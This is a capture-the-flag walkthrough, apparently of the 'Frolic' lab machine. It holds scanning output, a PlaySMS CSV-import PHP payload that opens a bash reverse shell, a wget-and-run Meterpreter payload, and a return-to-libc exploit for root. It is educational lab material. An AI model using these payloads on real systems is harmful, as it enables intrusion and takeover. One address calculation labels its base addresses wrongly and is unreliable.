Vulnerable to return to libc buffer overflow. https://en.wikipedia.org/wiki/Return-to-libc_attack
User flag
Open ports
IP=10.10.10.111
nmap -T4 -sT -p 1-65535 $IPPORT STATE SERVICE
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1880/tcp open vsat-control
9999/tcp open abyssPort 22 SSH
cd /usr/share/nmap/scripts/
nmap -sV -p 22 --script=ssh* $IPPorts 139/445 SMB
nmap -sV -p 445 --script=smb* $IPnbtscan -r $IPDoing NBT name scan for addresses from 10.10.10.111
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
10.10.10.111 FROLIC <server> FROLIC 00:00:00:00:00:00rpcclient -U "" $IP 1 ⨯
Enter WORKGROUP\'s password:
rpcclient $> srvinfo
FROLIC Wk Sv PrQ Unx NT SNT frolic server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
rpcclient $> getdompwinfo FROLIC
min_password_length: 5
password_properties: 0x00000000
We find user FROLIC, with password policy of 5 chars minimum on Ubuntu machine.
Port 1880
There is a web application “Node-RED” at http://10.10.10.111:1880 with a login page.
URL="http://10.10.10.111:1880"
WL=/usr/share/dirb/wordlists/common.txt
gobuster dir -k -u $URL -w $WL -s '200,204,301,302,307,403,500' -ehttp://10.10.10.111:1880/favicon.ico (Status: 200) [Size: 16958]
http://10.10.10.111:1880/flows (Status: 401) [Size: 12]
http://10.10.10.111:1880/icons (Status: 401) [Size: 12]
http://10.10.10.111:1880/red (Status: 301) [Size: 173] [--> /red/]
http://10.10.10.111:1880/settings (Status: 401) [Size: 12]
http://10.10.10.111:1880/vendor (Status: 301) [Size: 179] [--> /vendor/]
Try default credentials for Node-RED. The default login username is NR_account and password for Node-Red is NodeRed#0123..
WL=/usr/share/wordlists/rockyou.txt
ncrack -u FROLIC -P $WL http://${IP}:1880Port 9999
There is a web server nginx at http://10.10.10.111:9999.
URL="http://10.10.10.111:9999"
WL=/usr/share/dirb/wordlists/common.txt
gobuster dir -k -u $URL -w $WL -s '200,204,301,302,307,403,500' -ehttp://10.10.10.111:9999/.htaccess (Status: 403) [Size: 178]
http://10.10.10.111:9999/.htpasswd (Status: 403) [Size: 178]
http://10.10.10.111:9999/.hta (Status: 403) [Size: 178]
http://10.10.10.111:9999/admin (Status: 301) [Size: 194] [--> http://10.10.10.111:9999/admin/]
http://10.10.10.111:9999/backup (Status: 301) [Size: 194] [--> http://10.10.10.111:9999/backup/]
http://10.10.10.111:9999/dev (Status: 301) [Size: 194] [--> http://10.10.10.111:9999/dev/]
http://10.10.10.111:9999/test (Status: 301) [Size: 194] [--> http://10.10.10.111:9999/test/]
Execute gobuster for every directory previously found.
URL="http://10.10.10.111:9999/dev"
WL=/usr/share/dirb/wordlists/common.txt
gobuster dir -k -u $URL -w $WL -s '200,204,301,302,307,403,500' -ehttp://10.10.10.111:9999/dev/.htpasswd (Status: 403) [Size: 178]
http://10.10.10.111:9999/dev/.hta (Status: 403) [Size: 178]
http://10.10.10.111:9999/dev/.htaccess (Status: 403) [Size: 178]
http://10.10.10.111:9999/dev/backup (Status: 301) [Size: 194] [--> http://10.10.10.111:9999/dev/backup/]
http://10.10.10.111:9999/dev/test (Status: 200) [Size: 5]The page http://10.10.10.111:9999/dev/backup says /playsms, but playsms is not found under /dev/backup. However, there is a login page at http://10.10.10.111:9999/playsms.
http://10.10.10.111:9999/backup/
password.txt user.txt loop/http://10.10.10.111:9999/backup/user.txt
user - adminhttp://10.10.10.111:9999/backup/password.txt
password - imnothumanThere is a PHP page at http://10.10.10.111:9999/test/ displaying server configurations (phpinfo page).
There is a login page at http://10.10.10.111:9999/admin/ saying “c’mon i m hackable”… and the title says “Crack me :|”… There is no need for bruteforce, as the credentials are in the script http://10.10.10.111:9999/admin/js/login.js
if ( username == "admin" && password == "superduperlooperpassword_lol"){
alert ("Login successfully");
window.location = "success.html"; // Redirecting to other page.
return false;
}We find user admin with password superduperlooperpassword_lol
Log in the application. Content of /admin/success.html
..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... .....
..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... .....
....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! .....
..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
!!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... .....
..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?.
?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... .....
..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... .....
..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!!
!.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!!
!!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?!
.?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?..
!.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?.
?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.?
!!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!!
!.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!!
!.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. .....
..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!!
!!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!!
!!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! .....
..!.! !!!!! !.?.This is the Ook! programming language. Decode de message: https://www.dcode.fr/ook-language
Nothing here check /asdiSIAJJ0QWE9JASGo to http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS
UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA Decode the base64. This is a ZIP file of index.php. Download it.
wget http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/
cat index.html | base64 -d > file.zipThis is an encrypted ZIP file of index.php…
# Use word list, list MUST BE SORTED: sort(1)
cat /usr/share/wordlists/rockyou.txt | sort > /usr/share/wordlists/rockyou_sorted.txt
ZIPFILE=/root/file.zip
WL=/usr/share/wordlists/rockyou_sorted.txt
fcrackzip -u -D -p $WL $ZIPFILEPASSWORD FOUND!!!!: pw == passwordZIP file password is “password”
Unzip the file. This is hex.
4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0aDecode to ASCII hex. This is base 64.
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==Decode base 64. This is brainfuck…
+++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+
++ [->++ +<]>+
++.<+ ++[-> ---<] >---- --.-- ----- .<+++
+[->+ +++<] >+++. <+++[ ->---
<]>-- .<+++ [->++ +<]>+ .--
-. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
++..<
Decode it using https://www.dcode.fr/brainfuck-language
idkwhatispassWe found password idkwhatispass
This password works for user “admin” at http://10.10.10.111:9999/playsms
There is a file upload functionality at My account -> Phonebook -> Import. There is a PlaySMS RCE vulnerability: https://www.exploit-db.com/exploits/44598
Start a listener with netcat
nc -lvkp 4444Create file exploit.csv and import it. My Account -> Phonebook, click Import.
Name,Email,Department
<?php echo exec("whoami"); ?>,1,1Now change the exploit.csv file for executing a reverse shell.
Name,Email,Department
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/x.x.x.x/4444 0>&1'");?>,1,1The listener on port 4444 should have received a connection. Upgrade it to a real shell.
python -c 'import pty;pty.spawn("/bin/bash")'Upgrade the exploit to use a better shell (msf multi handler)
Start the Apache web server on Kali to distribute the payload
service apache2 startGenerate the reverse shell payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=5555 -f elf > /var/www/html/linux_shell.elfStart a listener on port 5555
msfconsole
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 5555
set ExitOnSession false
exploit -j -zCreate file exploit-msf.csv and import it. My Account -> Phonebook, click Import.
Name,Email,Department
<?php exec("wget -O /tmp/linux_shell.elf http://x.x.x.x/linux_shell.elf; chmod u+x /tmp/linux_shell.elf; /tmp/linux_shell.elf");?>,1,1You should have received a connection in the Metasploit listener.
sessions
sessions -i 1
sysinfoComputer : 10.10.10.111
OS : Ubuntu 16.04 (Linux 4.4.0-116-generic)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
shell
python -c 'import pty;pty.spawn("/bin/bash")'Explore…
cat config.php$core_config['db']['type'] = 'mysqli'; // database engine
$core_config['db']['host'] = 'localhost'; // database host/server
$core_config['db']['port'] = '3306'; // database port
$core_config['db']['user'] = 'root'; // database username
$core_config['db']['pass'] = 'ayush'; // database password
$core_config['db']['name'] = 'playsms'; // database nameMySQL root password is ayush.
ls -la /home
drwxr-xr-x 3 ayush ayush 4096 Sep 25 2018 ayush
drwxr-xr-x 7 sahay sahay 4096 Sep 25 2018 sahay
cd /home/ayush
ls -la
-rwxr-xr-x 1 ayush ayush 33 Sep 25 2018 user.txt
cat user.txt
2ab95909cf509f85a6f476b59a0c2fe0FLAG: 2ab95909cf509f85a6f476b59a0c2fe0
Root flag (Buffer Overflow)
The home directory of ayush contains a .binary directory.
cd /home/ayush/.binary
ls -la-rwsr-xr-x 1 root root 7480 Sep 25 2018 ropThis binary is owned by the root user.
./rop[*] Usage: program <message>./rop test[+] Message sent: testThe name of the binary “rop” hints to a buffer overflow on a technique called Return to libc that is a type of ROP. You can use the ldd command to find out which libc is being used by an application.
|-------------------------------|
| buffer[52] = 'A' x 52 | ← Our buffer which contains random 'A's
|-------------------------------|
| 'AAAA' | ← $EBP replaced by 4 random bytes
|-------------------------------|
| system() | ← Replaced the return address with the system call
|-------------------------------|
| exit() | ← Allows us to exit cleanely after system()
|-------------------------------|
| address of "/bin/sh" | ← Argument for system()
|-------------------------------|Fuzzing
./rop AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASegmentation fault (core dumped)Create a fuzzing script on Kali and make it available through Apache web server.
#!/usr/bin/python
import os # Run os commands
for i in range(1, 50):
buffer = 'A' * i
print("\nFuzzing with " + str(i) + " bytes")
#os.system('echo ' + buffer)
os.system('/home/ayush/.binary/rop ' + buffer)service apache2 startOn the victim machine, download the file.
wget -O /tmp/fuzzing.py x.x.x.x/fuzzing.pyExecute the script.
chmod u+x /tmp/fuzzing.py
/tmp/fuzzing.py[+] Message sent: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Fuzzing with 48 bytes
Segmentation fault (core dumped)Download the rop binary (within the meterpreter session).
download /home/ayush/.binary/rop /root/The same behavior happens on Kali machine using the fuzzing.py script.
[+] Message sent: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Fuzzing with 48 bytes
Segmentation fault (core dumped)Find the exact offset.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2AUse gbd to debug. Set the argument to the pattern created by pattern_create.rb
gdb ./rop
set args 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A'
break main
run
stepProgram received signal SIGSEGV, Segmentation fault.
0x62413762 in ?? ()Find the exact offset using pattern_offset.rb
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 100 -q 62413762[*] Exact match at offset 52The buffer overflows at 52 chars.
In gdb
info registerseax 0x64 100
ecx 0x0 0
edx 0x0 0
ebx 0xffffd140 -11968
esp 0xffffd110 0xffffd110
ebp 0x41366241 0x41366241
esi 0xf7fad000 -134557696
edi 0xf7fad000 -134557696
eip 0x62413762 0x62413762
eflags 0x10282 [ SF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99Find address of system(), in gdb:
print system$1 = {<text variable, no debug info>} 0xf7e0d000 <system>Find address of exit(), in gdb:
print exit$2 = {<text variable, no debug info>} 0xf7dff950 <exit>On the victim, find address of libc:
ldd ropldd rop
linux-gate.so.1 => (0xb7fda000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
/lib/ld-linux.so.2 (0xb7fdb000)On the victim, find address of /bin/sh:
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh 15ba0b /bin/shFind address of system
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system 245: 00112f20 68 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.0
627: 0003ada0 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE
1457: 0003ada0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
Find address of exit
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit 112: 0002edc0 39 FUNC GLOBAL DEFAULT 13 __cxa_at_quick_exit@@GLIBC_2.10
141: 0002e9d0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
450: 0002edf0 197 FUNC GLOBAL DEFAULT 13 __cxa_thread_atexit_impl@@GLIBC_2.18
558: 000b07c8 24 FUNC GLOBAL DEFAULT 13 _exit@@GLIBC_2.0
616: 00115fa0 56 FUNC GLOBAL DEFAULT 13 svc_exit@@GLIBC_2.0
652: 0002eda0 31 FUNC GLOBAL DEFAULT 13 quick_exit@@GLIBC_2.10
876: 0002ebf0 85 FUNC GLOBAL DEFAULT 13 __cxa_atexit@@GLIBC_2.1.3
1046: 0011fb80 52 FUNC GLOBAL DEFAULT 13 atexit@GLIBC_2.0
1394: 001b2204 4 OBJECT GLOBAL DEFAULT 33 argp_err_exit_status@@GLIBC_2.1
1506: 000f3870 58 FUNC GLOBAL DEFAULT 13 pthread_exit@@GLIBC_2.0
2108: 001b2154 4 OBJECT GLOBAL DEFAULT 33 obstack_exit_failure@@GLIBC_2.0
2263: 0002e9f0 78 FUNC WEAK DEFAULT 13 on_exit@@GLIBC_2.0
2406: 000f4c80 2 FUNC GLOBAL DEFAULT 13 __cyg_profile_func_exit@@GLIBC_2.2
We have all we need to write the exploit:
- system: 0x0003ada0 + 0xf7e0d000 = 0xb7e53da0
- exit: 0x0002e9d0 + 0xf7dff950 = 0xb7e479d0
- /bin/sh: 0x15ba0b
- libc: 0xb7e19000
Address of shell (use online calculator) : address of libc + address of /bin/sh = 0xb7e19000 + 0x0015ba0b = 0xb7f74a0b
Final exploit, put it in /var/www/html/exploit_frolic.py on Kali:
#!/usr/bin/python
import struct
buf = "A" * 52
system = struct.pack("I" ,0xb7e53da0)
exit = struct.pack("I" ,0xb7e479d0)
shell = struct.pack("I" ,0xb7f74a0b)
print buf + system + exit + shellOn the victim machine:
wget -O /tmp/exploit_frolic.py http://10.10.14.26/exploit_frolic.py
chmod u+x /tmp/exploit_frolic.py
/home/ayush/.binary/rop `python /tmp/exploit_frolic.py`whoamirootcat /root/root.txt85d3fdf03f969892538ba9a731826222FLAG: 85d3fdf03f969892538ba9a731826222
Other simple payload:
./rop `python -c 'print("A"*52 + "\xa0\x3d\xe5\xb7" + "\xd0\x79\xe4\xb7" + "\x0b\x4a\xf7\xb7")'`